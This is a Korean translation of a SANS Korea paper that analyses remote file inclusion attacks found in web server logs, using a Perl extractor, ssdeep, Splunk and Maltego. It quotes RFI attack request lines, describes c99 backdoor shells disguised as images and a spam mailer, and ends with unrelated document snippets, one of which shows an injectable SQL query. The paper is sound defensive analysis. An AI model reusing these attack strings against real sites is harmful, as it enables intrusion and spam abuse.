21 로그로부터 RFI 공격을잡기위해 2008년에펄스크립트 (RFI 추출물로써여기에언급된 ) 를만들었다. 이솔루션은정규표현식을이용하여로그의좌측값 ( 단순측면에서, 파라미터입력의왼쪽으로부터 ) 을줄이고, RFI 공격시도를표현하는부분에대한파라미터입력값이후의 URL을비교할수있도록정리하였다. 다음은 2011년 11월의전체 holisticinfosec.org 로그항목은다음과같다 : [01/Nov/2011:11:10: ] "GET/content/view/184/45/index.php?_REQUEST=&_REQUEST%5boption%5 d=com_content&_request%5bitemid%5d=1&globals=&mosconfig_absolute _path= HTTP/1.1" "-" "libwww-perl/ 월의전체로그에대해 perl rfi-extract.pl -e -f holisticinfosec.org-nov-2011 를실행한후, RFI 추출물출력파일은다음과같다. "01/Nov/2011:11:38: "," ", " Logon.txt는공격자가 mosconfig_absolute_path 파라미터를통해 원격으로인클루드 를시도했던파일을나타낸다. RFI 추출스크립트는저자의이메일주소를통해요청할수있다. 추출스크립트는리눅스에서실행하는것이쉽다. 우분투 / 데비안시스템의의존사항을설치하려면 sudo apt-get install libdate-calc-perl libfile-tail-perl을입력한다. 이들의존성은윈도우에서실행하는펄도만족해야한다. 위 perl rfi-extract.pl -e -f holisticinfosec.org-nov-2011 명령어에서, -e 플래그는스크립트가 RFI URL만추출하는것이고 f 플래그는원했던로그파일을호출한다. 전체로그에서 RFI-extract 를이용해서 RFI 시도로그로만줄여서 ssdeep과 Splunk와같은다른도구와함께훨씬더효과적으로분석할수있다 Ssdeep RFI 공격중에서하나의공통점이코드재사용이다. 피해자와공격자가서버에서공격스크립트를확인한후, 연구자들은유사성을확인할수있다. 다시 Imperva의 2011년 5월보고서 (Imperva, 2011) 는 포함된스크립트파일의유사한복사본으로다른서버해킹에사용된다. 라고지적하고있다. 이것은 holisticinfosec.org 로그항목과 Ssdeep을사용하여증명될수있다. Jesse Kornblum의 Ssdeep은 context triggered piecewise hashes(ctph) 2015 SANS 코리아 / ITL

22 또는퍼지해시를계산하는데사용된다. 퍼지해시는 입력값이동일한순서로일련의동일한바이트가지고있는것이며, 이중시퀀스중간의바이트는컨텐트및길이에서다를수있다. 는동질성을가지고입력값을비교할수있다. 동질성에대한근거는여기에서중요하다. 버클리대학의 Understanding Evolution 웹사이트에따르면, 진화론은공통된조상에서파생된유사성을공유하는유기체들과관련되는것을예측한다. 관계성으로인한유사한특성은동질성으로알려져있다. (Various, 2006). 이이론은 RFI 코드재사용의분석을위한증거로사용된다. 2012년 2월에 holisticinfosec.org 로그에서 RFI 추출물을활용하여, 겉으로관련없는공격시도로부터인클루드파일을 sdeep으로조사한다. 다음의두개의 RFI 추출출력항목은포함시도를한 URL을나타낸다. 1) "04/Feb/2012:20:45: "," ", 2) "24/Feb/2012:17:35: "," ", " 소스 IP 주소는이탈리아와루마니아로부터, 인클루드파일도메인은각각이탈리아와중국에서호스팅되고있다. 이러한사실은포함된파일에전혀관계가없는것처럼보이지만, 인클루드파일인 tid.gif와 ipays.jpg 사이에, ssdeep은다르게해석한다. RFI 공격에자주사용되는전술중하나는스크립트파일을속이기위해이미지파일확장자를사용하여탐지를피하고, 필터링을우회한다. Ssdeep 소스코드재사용기능을활용하기위해각각포함한파일을비슷하게명명된 eurosystem 및 salimhome 디렉토리에배치되었다. Ssdeep l 플래그는파일이름의상대경로를사용하고, -r 플래그는재귀모드를설정한다. 따라서 ssdeep lr eurosystems > eurosystems.txt는 eurosystems 디렉토리에파일에대한퍼지해쉬값을계산한다. 그다음 tid.gif의해쉬값과 ipay.jpg의해쉬값을계산하기위해, ssdeep lrm eurosystems.txt salimhome 을실행한다. 사용자들은 v를추가하여상세사항을볼수있고, a를추가하여 0에도불구하고점수를만들수있다 : D:\malwareAnalysis\RFI\current>ssdeep -lrm eurosystems.txt salimhome salimhome\ipays.jpg matches eurosystems.txt:e (90) (90) 으로표현된점수는 0 에서 100 사이의가중치이며, 파일의유사성이높을수록숫자가 높아진다. 동질성의이론으로되돌아가서살펴보면 관련된생물은공통된조상으로부터 2015 SANS 코리아 / ITL

23 파생되는유사성을공유할것이다 에따라, 이연구는명확하게 tid.gif와 ipays.jpg 사이에상당한유사성이있다는것을나타낸다. 실제파일의검토해보면두파일은 c99 inkektor v 의복사본이며, ipays에의해재코딩및수정되었다. C99 inkektor는 Backdoor:PHP/C99shell 버전으로피해서버에원격악의적인사용자접근을허용하는 PHP 스크립트다. 두버전모두 sh_mainurl 파라미터아래 c99ssh의업데이트를위해 를호출했다. 하지만이메일파라미터는 ipays.jpg는 으로 tid.gif는 로다르게정의되었다 Splunk 다행히독자는이미 Splunk와기능에대해서잘알고있기를바란다. Splunk에대한소개자료가필요하면, Splendid Splunk : Unifying Events with Splunk 를추천한다. 이것은 ADMIN 잡지의 2010년 6월판에발표되었다. 이번연구를위해서, Splunk 인스턴스로 2개의인덱스를만들었다. 첫번째인덱스 holisticinfosec은 2011년 6월에서 2012년 4월까지 holisticinfosec.org의가공되지않은아파치로그로 1,091,692 개의로그가있다. 두번째인덱스인 RFI 추출물은 HOLISTICINFOSEC에서인덱스된동일한원시로그값에대해서 3.2.2절에서언급된 RFI-extract를실행하여얻은결과만을포함한다. 이색인은 3,871 개의로그가있다. Splunk 사용자가 index= rfi-extract iplocation table IPv4, City, Country top Country와같이쿼리를수행할수있도록 IP 위치기능이포함되어있다. 결과는전체로그항목의비율에의한국가, 개수, 그리고순위를포함하는테이블이다. RFI-extract 인덱스에대한쿼리를실행하면, 소스 IP 주소출처에대해서국가별많은곳에서적은순으로반환한다. 이같은쿼리로직은피해자의지리적분포를알아낼때도실행될수있다. 만약에 Splunk가원래기능이없다면, Splunk 사용자가인덱스된데이터로부터필드를추출해야할수있다. 예를들어, RFI-extract 인덱스데이터로부터 URL을쿼리하기위해서 index= rfi-extract 를실행한다. 그림 15에서와같이, 첫번째결과에서아래쪽화살표버튼은클릭되고추출필드가선택되었다 SANS 코리아 / ITL

24 그림 15: Splunk 추출물필드 전체 URL이 Example로복사되고, Generate가선택되었다. 해당필드에대해정규식은자동으로생성되고, 선호하는필드이름으로저장하면된다. 여기서는 URL을필드이름으로사용하였다. 새롭게정의된필드를이용한쿼리는 index= rfi-extract top url 이다. 그림 16에서보여지는것처럼, 결과는로그항목의순서로선정되고 RFI 공격시도의일부분으로 URL은대부분포함될것이다. 그림 16: RFI 도메인 그림 10에나타난도메인중하나를분석해보면, 재미있는결과는다수의관련여러소스 IP들이있으며, 이것은 holisticinfosec.org 에동일한파일을원격으로포함하려고하는많은공격자가있다는것을의미한다. 소스 IP인 와 는각각 44회호출하였다 회의원격파일포함공격시도중에서, dedi24.com 도메인이포함된공에서알려진 을포함하여 6개의서로다른소스 IP들이확인되었다. 이들 6개 IP 주소는아래의 절에서공통점을위해분석된다 RFI 분석과통계 2015 SANS 코리아 / ITL

25 위에서언급한방법을통해인터넷백그라운드공격의전제로수집된데이터를연결하기위해서는추가적인분석단계가필요하다. 이번실습은그림 17에서보여지는것처럼 월 12일부터가공하지않는 holisticinfosec.org 로그항목을가지고시작할것이다. 그림 17: 가공하지않은 RFI 시도로그항목 RFI 추출을통해동일한로그가아래와같이줄어든다 : "12/Apr/2012:20:05: ", " ", 아래의존재하지않는매개변수를통해원격으로 를 포함하기위해소스 IP ( 캐나다 ) 로부터공격시도는있었다 : /toolsmith//dfd_cart/app.lib/product.control/core.php/customer.ar ea/customer.browse.list.php?set_depth=?src= 그림 9 에서보여지는것처럼 404 에러를통해공격시도가실패한것으로나타나고, toolsmith 디렉토리는단순히 PDF 파일을호스팅한다. 또한 CL 도메인은칠레진원지 사이트를의미하지만 ThePlanet( ) 인미국에서호스트된다. 공통적이기때문에, RFI 공격시도에서포함된파일은공격소스 IP 주소와는완전히다른위치에서호스트된다. 이공격시도는아이러니를가지고있다. 첫째, 파일이름 tim.php 를확인해라. 최근 발표된대량의 RFI 공격은가짜백신을제공하기위해워드프레스 TimThumb 이미지 크기를조정하는스크립트 (timthumb.php) 에대한공격을포함하고있다 (Goodin, 2011). 그러나비록도메인이름 wordpress.com.scemuss.cl 은정말다른것이라고암시하지만, tim.php 를호스팅하는서버는줌라 (Joomla) 인스턴스를실행하고있다. 이것은아마도 공격자가피해자시스템에 tim.php 파일을안전한것으로위장하기위한시도로보인다. 둘째, 공격시도는 Dragon Frugal 의 PHP 쇼핑카드스크립트인 DFD Cart(dfd_cart) 에대한 참조를포함하고있다. DFD Cart 는 Secunia Advisory SA26920(Secunia, 2007) 을통해 2007 년에여러개의파일포함취약점을있었다고알려졌다. 그림 9 의로그항목안에 포함된것으로보여지는 app.lib/product.control/core.php 디렉토리안에 2007 개의 발견사항에대한취약한모든스크립트가위치해있었다. 그러나더아이러니한것은 저자가 DFD Cart 웹사이트 (DragonFrugal, 2010) 에서공지되고, Secunia Advisory 2015 SANS 코리아 / ITL

26 SA38635(Secunia, 2010) 을통해발표된다른 DFD Cart 취약점을발견하였다는것이다. RFI 공격자는검색엔진로직을이용해서 holisticinfosec.org에발표된 DFD Cart 보안권고문을발견하였다고결론낼수있다. 그러나동적기능이없는전혀관련없는정적디렉토리를대상으로파일포함공격시도가있었다. 대신공격자는공격이실패하였고, 피해자는패치를하지않은상황에서이번발견사항은정말의도하지않고인터넷백그라운드공격을대표할수있는교과적인사례가되었다. 공격도구설정오류 를포함하는 2.2절의 IBR/IBA 정의에서보면, 위에서사용된 RFI C&C 설정은기껏해야제한된공격대상을선택하는것이고, 최악의경우완전히설정오류이다. PHP 스크립트 tim.php는스팸메일발송스크립트인 PHP:Mailer-K이며, 악성코드분석워크스테이션으로다운로드되었다. wordpress.com.scemuss.cl에대한루트디렉토리를열거해보니, tim.php를호스팅하는서버는 aa.php와 setf.php 스크립트도호스팅하고있었다. HTML 스크립트로잘못명명된 (PHP가아님 ) 이두스크립트는그림 18에서보여지는것처럼 tim.php 메일발송로직을이용하는데사용되기위해동일한웹폼이었다. 그림 18: 액션에서 PHP 메일러 그림 12 에서보여지는것과같이메일러는잘동작하며발송하면대상이메일주소의스팸 폴더에즉시도착한다. 즉 SmartScreen 필터의의심메일에대한표준을만족한다 SANS 코리아 / ITL

27 그림 19: PHP 메일러결과 인터넷공격의계속반복되는형태중하나인스팸을전파하기위해 RFI 공격이피해자호스트를해킹하는것을고려하면, 이것도인터넷백그라운드공격의근거가된다. 몇달동안 IBA와같은활동과연관되어있다는것을찾기위해소스 IP 에대해서검색엔진쿼리를수행할필요가있다. 프로젝트허니팟은 URL을사용하여익스플로이트 / 삽입시도로인해금지 : /forum/timthumb.php?src= (Teschner3, 2012) 라고기술하고있다. 즉위에언급했듯이공격자는명확하게 TimThumb 인스턴스를타겟으로했다. 통계를위해원시데이터로돌아와서, 섹션 3.2.4로부터 Splunk 쿼리는많은흥미로운사항을발견하였다. 그림 20에서는소스 IP의지리적분포를국가별로카운트하여보여준다 SANS 코리아 / ITL

28 그림 20 그러나, 공격을입은사이트 ( 인클루드파일을호스팅하는사이트 ) 의국가별도메인의지리적 분포를보면그림 21 에서보여지는것과같이공격자들의지리적분포와비교해서 재미있는유사성및차이점을보여준다. 그림 SANS 코리아 / ITL

29 두데이터모두독일, 폴란드뿐만아니라미국이가장공격출처로가장높은반면, 유사성은여기서끝난다. 인도네시아, 슬로바키아공화국 (SK) 그리고말레이시아에서 호스팅된피해자사이트는인클루드공격시도에서굉장히높은것을보여준다. 한가지 흥미로운사이트는슬로바키아공화국 (rebro.sk) 의서버는추가분석이필요할것으로 보인다. 앞에서설명하였듯이 IBR/IBA 을발생시키는요인중의하나는 네트워크서버설정 오류, 서비스그리고다양한다른소프트웨어프로그래밍버그들 의결과로서비정형적인 행위이다. 위에서언급한 Splunk 쿼리로식별되는피해자의사이트에서공격시도에포함된 많은 URL 을검토할때는, 비정형적인행위를추가분석하기위해하나의사이트가 선택되었다. 그림 22 와 23 에서보여지는것처럼 를통한디렉토리 추적 ( 종종 RFI 공격과관련된 ) 취약점과 src= 을통한크로스 사이트스크립팅 (XSS) 취약점이바로언급되었다. 이러한취약점은사이트운영자에게 보고되고, 패치하겠다는답을받았다 SANS 코리아 / ITL

30 그림 22: 디렉토리추적 그림 23: 크로스사이트스크립팅 디렉토리추적은확실히서버설정오류나소프트웨어프로그래밍버그범주에서 2015 SANS 코리아 / ITL

31 발생한다. 그리고 XSS는실제로소프트웨어결함이다. 이러한취약점을인해해킹될수있는웹애플리케이션은 RFI나 SQL 인젝션과같은더심각한공격을받을수있다. 피해서버에서발견된추가적인애플리케이션취약점은 OWASP 10대취약점의 A1 인젝션과 A6 보안설정오류에포함된다. 2011년 11월에 holisticinfosec.org에대한로그에서확인된하나의사이트는 Exploit.E107-1로 ClamAV에의해발견된인클루드파일을호스팅하였다. E107은널리사용되는콘텐츠관리시스템 (CSM) 웹애플리케이션이다. include 파일경로는 이었다. 이시나리오의실제피해애플리케이션은취약한 Joomla( 또다른인기있는 CMS) 애드온으로, 이것은 VirtueMart로써알려진쇼핑카드애플리케이션이다. rebro.sk의데이터뿐만아니라이러한발견사항들은가장많이 RFI 공격을당하는웹애플리케이션은 Joomla, 워드프레스및 E107이라는사실을말해준다. IBA 패턴조사를위한마지막전술은 Maltego를통한관계분석이다. Maltego는 IPv4 주소, 도메인이름, 이메일주소, 그리고소셜네트워크그룹핑과같은많은유용한항목사이에관계와연결성을결정할수있는프로그램이다. 이러한관계는트랜스폼이라는매핑를통해서가능하다 (Pateva, 2012). 섹션 3.2.4에논의된데로, 6개의소스 IP 주소는원격으로 HolisticInfoSec 웹사이트에서 이 IP 주소, , , , , , 그리고 는 Maltego 작업공간에 IPv4 주소항목에입력하였다. 어떤개체가가장많이들어오는 ( 공유되는 ) 관계를보여줄를결정하기위해처음에는 All Transforms을선택한다. 그림 24에서이해하기힘든결과를보여준다. 그림 24 : 모든변환은통제하기힘든것을증명한다. 모든개체를포함하여그래프에서너무많은결과를보여주므로, 변환선택을해서모든여섯개의 IP에서 Other Transforms 그룹핑에서 To Website where IP appears(using Search Engine) 로크기를줄인다. 그결과그래프가너무작아서읽을수가없었다. 잘보게하기위해 2015 SANS 코리아 / ITL

32 개체를선택해서, 마우스오른쪽버튼을클릭하면 Copy to New Graph -> Copy with Neighbors -> Parents -> 5 로처리되었다. 결과는그림 25에서도보여지는것처럼 IP 주소를보여주는그래프가되었다. 그림 25: 유해한 IP 관계 분명히 holisticinfosec.org 로그에서발견된 RFI 공격에연관된여섯개의 IP는또한비인가접근과 SQL/ 코드인젝션을포함한유사한동작이탐지된다른로그항목에서도언급되었다. 하나는 Maltego를이용해서관계의가치를쉽게알수있다. 이러한결과는더깊은분석을통해많은사람들이굉장히가치있는것으로생각하고있다. 4. 결론 이번연구의목적은인터넷백그라운방사에대한학문적연구로부터파생된인터넷백그라운드공격이굉장히펴져있고, 모든웹애플리케이션은아니더라도대부분의로그에서발견할수있는일정한공격패턴이라는것을보여주기위해서이다. 3.1 대량 SQL 인젝션공격에서조사된것처럼, ASP, ASP.net, 그리고 ColdFusion과같은일반적인웹 2015 SANS 코리아 / ITL

33 애플리케이션플랫폼은적절히유지되고, 방어가되지않으면자동화된, 대량의 SQL 인젝션공격을당한다. 해킹이되면웹애플리케이션자체의해킹뿐만아니라방문자도피해를입어자바스크립트로인해다른악성사이트로리다이렉트된다. Log Parser를기반으로특정로그분석도구를이용하면분석가들은대량의로그에대해서 SQL과같은쿼리이점을이용할수있고, 불법행위에대해쉽고빠르게분석할수있다. 3.2 원격파일포함 (RFI) 공격에서다뤘듯이, PHP 애플리케이션도 RFI 공격의형태로자동화된트래픽으로부터끝임없이공격을당한다. 이공격방법은 SQL 인젝션공격못지않게피해가크며, 피해사이트수는적을수있지만, 피해웹애플리케이션을완전히해킹할수있어피해는더클수있다. 하이라이터 (Highlighter), Splunk, 그리고 Maltego 등의도구를통해분석가는방어력를개선하는지속적인패턴과측정을도출할수있다. Imperva, SpiderLabs 에서제공하는것뿐만아니라여기에서도출된데이터를고려하면, 웹애플리케이션으로가는측정가능한비율의트래픽은악의적으로공격하는것이라는것을알수있다. 인터넷백그라운드공격을위한기준으로악성트래픽으로인한비생산적트래픽및비정형행위의속성뿐만아니라, 네트워크서버설정오류, 서비스및공격도구설정오류를이용하면, 방어와유지보수역량을확실히향상시킬수있다. 도구및방법으로무장하여웹로그렌즈를통해이러한공격을보는분석가들은개선사항을강화할수있다 SANS 코리아 / ITL

34 5. 참조 Burnett, M. (2010, November 02). Forensic log parsing with microsoft's logparser. Retrieved from Danchev, D. (2012, May 08). [Web log message]. Retrieved from DragonFrugal. (2010). Version 1.2 and greater have security fixes related to secunia.com's security advisory sa Retrieved from Giuseppinni, G., & Burnett, M. (2004). Log parser toolkit. (p. 2). Rockland, MA:Syngress. Goodin, D. (2011, November 02). Thousands of wordpress sites commandeered by black ole. Retrieved from Imperva. (2011). Hacker intelligence summary report remote file inclusion. Hacker Intelligence Initiative, Monthly Trend Report #1 Imperva. (2012). Remote and local file inclusion vulnerabilities 101. Hacker Intelligence Initiative, Monthly Trend Report #8 Imperva. (2012). Automation of attacks. Hacker Intelligence Initiative, Monthly Trend Report #9 Kornblum, J. (2011, September 30). Fuzzy hashing and ssdeep. Retrieved from McRee, R. (2012). Toolsmith: Log parser lizard. ISSA Journal, 10(4), Pang, R., Yegneswaran, V., Barford, P., Paxson, V., & Peterson, L. (2004). In A.Lombardo(Chair). Characteristics of internet background radiation. In Proceedings of the 4th ACM SIGCOMM (pp ). New York, NY:Association for Computing Machinery. Hofman, M. (2011, December 01). Sql injection attack happening atm. Retrieved from Paterva. (2012). Maltego. Retrieved from SANS 코리아 / ITL

35 Secunia. (2007, September 24). Secunia advisory sa26920 dfd cart "set_depth" multiple file inclusion vulnerabilities. Retrieved from Secunia. (2010, March 03). Secunia advisory sa38635 dfd cart cross-site scripting and cross-site request forgery vulnerabilities. Retrieved from Stuttard, D. (2011). Download burp suite. Retrieved from Stuttard, Dafydd & Pinto, Marcus. The Web Application Hacker s Handbook. Indianapolis, IN: Wiley Publishing Company. Teschner3, T. (2012, March 19). Banned due to exploit/injection attempts by url [Online forum comment]. Retrieved from Tilbury, C. (2011, February 11). Computer forensics how-to: Microsoft log parser. Retrieved from urlquery. (2012, May 07). urlquery. Retrieved from Various. (2006). Lines of evidence: homologies. Retrieved from Wustrow, E., Karir, M., Bailey, M., Jahanian, F., & Huston, G. (2010). In M. Allman(Chair). Internet background radiation revisited. In Proceedings of the 10 th annual conference on Internet measurement (pp ). New York, NY:Association for Computing Machinery. Zalewski, M. (2012). The tangled web. (p. 256). San Francisco: no starch press SANS 코리아 / ITL

36 Cyber Security Summer 2015 사이버보안전문교육및역량평가전문기관 ITL은 2013년, 2014년에이어국내최고의전문가가참여하는최신의 Cyber Security Summer 2015 사이버보안교육행사를개최합니다. 본행사는침투시험기술과, 침입탐지기술, 윈도침해사고포렌식기술등을배울수있는교육과정이개설되며, 시스템을대상으로해킹하면서배운내용을익힐수있는해커톤프로그램이개설됩니다. 코스를놓치지마십시요! 2015년 8월 26일 ~ 29일, 서울강남구삼성동코엑스 2015년 8월 26일 ( 수 ), 1일교육과정 - M210: 메타스플로이트를이용한침투시험 2015년 8월 27일 ( 목 ) 28일 ( 금 ), 2일교육과정 - M250: 웹애플리케이션침투시험기법 - M300: 윈도침해사고포렌식분석 ( 업데이트!) - M330: 침입탐지를위한로그분석방법 ( 업데이트!) 2015년 8월 29일 ( 토 ) - 해커톤 : 실제시스템대상침투시험시행 ITL 아카데미 ITL 아카데미는사이버보안전문분야에대해서여러개의과정을동시에수강해서분야별전문가를양성하는과정입니다. ITL 아카데미는최소 10명에서최대 20명의수강생으로교육이진행됩니다. 교육진행방식은기존의 ITL 교육과동일하게진행됩니다. ITL 교육, 국내외 SANS 교육및 GIAC 자격증과관련사항은아래로문의바랍니다. 전화 : 031) 이메일 : itl@itlkorea.kr, sans@sans.or.kr 2015 SANS 코리아 / ITL

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상 Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는

More information

Microsoft Word - src.doc

Microsoft Word - src.doc IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...

More information

DBMS & SQL Server Installation Database Laboratory

DBMS & SQL Server Installation Database Laboratory DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.

More information

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8

인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 인도 웹해킹 TCP/80 apache_struts2_remote_exec-4(cve ) 183.8 차단 IP 국적 공격유형 목적지포트 IPS 룰 222.119.190.175 한국 서비스취약점공격 TCP/110 #14713(POP3 Login Brute Force Attempt-2/3(count 30 seconds 10)) 52.233.160.51 네덜란드 웹해킹 TCP/80 Apache Struts Jakarta Multipart Parser Remote

More information

<4D F736F F F696E74202D203137C0E55FBFACBDC0B9AEC1A6BCD6B7E7BCC72E707074>

<4D F736F F F696E74202D203137C0E55FBFACBDC0B9AEC1A6BCD6B7E7BCC72E707074> SIMATIC S7 Siemens AG 2004. All rights reserved. Date: 22.03.2006 File: PRO1_17E.1 차례... 2 심벌리스트... 3 Ch3 Ex2: 프로젝트생성...... 4 Ch3 Ex3: S7 프로그램삽입... 5 Ch3 Ex4: 표준라이브러리에서블록복사... 6 Ch4 Ex1: 실제구성을 PG 로업로드하고이름변경......

More information

SIGIL 완벽입문

SIGIL 완벽입문 누구나 만드는 전자책 SIGIL 을 이용해 전자책을 만들기 EPUB 전자책이 가지는 단점 EPUB이라는 포맷과 제일 많이 비교되는 포맷은 PDF라는 포맷 입니다. EPUB이 나오기 전까지 전 세계에서 가장 많이 사용되던 전자책 포맷이고, 아직도 많이 사 용되기 때문이기도 한며, 또한 PDF는 종이책 출력을 위해서도 사용되기 때문에 종이책 VS

More information

Windows 10 General Announcement v1.0-KO

Windows 10 General Announcement v1.0-KO Windows 10 Fuji Xerox 장비와의호환성 v1.0 7 July, 2015 머리말 Microsoft 는 Windows 10 이 Windows 자동업데이트기능을통해예약되어질수있다고 6 월 1 일발표했다. 고객들은 윈도우 10 공지알림을받기 를표시하는새로운아이콘을알아차릴수있습니다. Fuji Xerox 는 Microsoft 에서가장최신운영시스템인 Windows

More information

로거 자료실

로거 자료실 redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...

More information

wtu05_ÃÖÁ¾

wtu05_ÃÖÁ¾ 한 눈에 보는 이달의 주요 글로벌 IT 트렌드 IDG World Tech Update May C o n t e n t s Cover Story 아이패드, 태블릿 컴퓨팅 시대를 열다 Monthly News Brief 이달의 주요 글로벌 IT 뉴스 IDG Insight 개발자 관점에서 본 윈도우 폰 7 vs. 아이폰 클라우드 컴퓨팅, 불만 검증 단계 돌입 기업의

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

PowerPoint Template

PowerPoint Template JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것

More information

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Outline Network Network 구조 Source-to-Destination 간 packet 전달과정 Packet Capturing Packet Capture 의원리 Data Link Layer 의동작 Wired LAN Environment

More information

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc 분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.

More information

Observational Determinism for Concurrent Program Security

Observational Determinism for  Concurrent Program Security 웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구

More information

Inside Android Applications

Inside Android Applications WEBSECURIFY WALKTHROUGH 웹 응용프로그램 침투 테스팅 도구 번역 문서 www.boanproject.com 번역 : 임효영 편집 : 조정원 해당 문서는 연구목적으로 진행된 번역 프로젝트입니다. 상업적으로 사용을 하거나, 악의적인 목적에 의한 사용을 할 시 발생하는 법적인 책임은 사용자 자신에게 있음을 경고합니다. 원본 : http://resources.infosecinstitute.com/websecurify-testing-tool/

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

